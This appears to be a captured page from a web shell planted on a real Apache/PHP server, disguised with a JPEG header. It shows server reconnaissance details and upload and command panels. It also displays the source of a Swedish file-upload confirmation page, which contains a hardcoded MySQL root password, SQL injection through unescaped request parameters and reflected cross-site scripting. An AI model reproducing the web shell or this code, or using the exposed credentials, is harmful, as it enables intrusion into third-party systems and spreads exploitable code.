????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.142.97.186
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/thermotech/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/thermotech/completed.php
<?php
	session_start();
	if(!isset($_SESSION['ASTACUS_SSO_INFO']) || 
		(trim($_SESSION['ASTACUS_SSO_INFO'])=='')){
		header('location: index.php');
	}
	
	
	$SystemUserId  = $_SESSION['ASTACUS_SSO_INFO'][0];
	$Name		   = $_SESSION['ASTACUS_SSO_INFO'][1];
	$Username	   = $_SESSION['ASTACUS_SSO_INFO'][2];
	$UserGroupId   = $_SESSION['ASTACUS_SSO_INFO'][3];
	$CompanyId     = $_SESSION['ASTACUS_SSO_INFO'][4];
	$Email    	   = $_SESSION['ASTACUS_SSO_INFO'][5];
	$Phone     	   = $_SESSION['ASTACUS_SSO_INFO'][6];
	// Get Company name 
		
	$link = mysql_connect ("localhost", "root", "root123");
	mysql_select_db ("vpa");
			
	$sql = "SELECT Name FROM Company WHERE CompanyId = $CompanyId";
	
	$result = mysql_query($sql);
	while ($row = mysql_fetch_assoc($result)){
		$Company = $row['Name'];
	}
	
	$ProjectID = $_GET['projectId'];
	$Projectname = $_GET['projectname'];
	////////////////////////////// ACTIONS ////////////////////////////////
	if($_GET['action'] == "change"){
		$Projectname = $_POST['Projectnbr'];
		$sql = "UPDATE Project SET Name ='$Projectname' WHERE ProjectId = $ProjectID ";
		 mysql_query($sql);
	}
	///////////////////////////////////////////////////////////////////////
	
	
	require_once("sendNotification.php");
	sendNotification($ProjectID,2,$Company,$Email);
?>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Astacus AP Interface - Thermotech </title>
<style type="text/css">
<!--
.style6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; }
-->
</style>

<script src="js/date-functions.js" type="text/javascript"></script>
<script src="js/datechooser.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="js/datechooser.css">
<style type="text/css">
<!--
.style7 {font-size: 36px}
-->
</style>
</head>

<body background="images/bg.jpg" topmargin="0" marginheight="0">
<br>
<table width="950" height="555" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="20" rowspan="2" valign="top"><img src="images/sid-v.gif" width="20" height="210"></td>
    <td width="454" height="60" valign="middle" bgcolor="#FFFFFF"><img src="images/thermotech-golvvarme.gif" width="157" height="37"></td>
    <td width="456" valign="middle" bgcolor="#FFFFFF"><div align="right"><img src="images/Logo-Astacus.jpg" width="120" height="27"></div></td>
    <td width="20" rowspan="2" valign="top"><img src="images/sid-h.gif" width="20" height="210"></td>
  </tr>
  <tr>
    <td colspan="2" valign="top" bgcolor="#FFFFFF"><table width="950" height="400" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td valign="top"><div align="center"><br>
               <form action="?action=change&projectId=<?php echo($ProjectID);?>" method="post">
                  <table width="850" border="0" align="center" cellpadding="0" cellspacing="0">
                <tr align="left">
                  <td width="170"><span class="style6">Inloggad som: <br>
      F&ouml;retag: <br>
      Projektnummer/namn:      <br>
      <br>
      <a href="default.php" class="style6"><strong>&lt;&lt; Tillbaka </strong></a><br>
                  </span></td>
                  <td width="228"><span class="style6"><?php echo($Name . " (".$Username.")");?> (<a href="index.php?action=logout">Logga ut</a>) <br>
                        <?php echo($Company);?> (<?php echo($CompanyId);?>)<br>
                 <input name="Projectnbr" type="text" id="Projectnbr" value="<?php echo($Projectname);?>"> 
                 <br>
                 <br>
                 <br>
</span></td>
                  <td width="252"><span class="style6">
                    <br>
                    <input type="submit" name="Submit" value="&Auml;ndra namn">
                    <br>
                    <br>                    
                  </span></td>
                </tr>
              </table> </form>
              <br>
              <table width="850" border="0" cellspacing="0" cellpadding="0">
                <tr>
                  <td align="left"><div align="left">
                    <p class="style6"><strong><br>
                      </strong></p>
                    <p align="center" class="style6"><strong>    <span class="style7">Tack, dina filer &auml;r nu uppladdade! </span></strong></p>
                    <p align="center" class="style6"><strong><?php echo($_SESSION['uploaded_files']);?><br>
                        <br>
                        </strong>
                    </p>
                  </div>
                    <p><a href="default.php" class="style6"><strong>&lt;&lt; Tillbaka </strong></a>
                    <strong>
                    <p>&nbsp;</p>
                    </strong>
                  </td>
                </tr>
              </table>
          </div>
          </td>
      </tr>
    </table></td>
  </tr>
</table>
</body>
</html>


Youez - 2016 - github.com/yon3zu
LinuXploit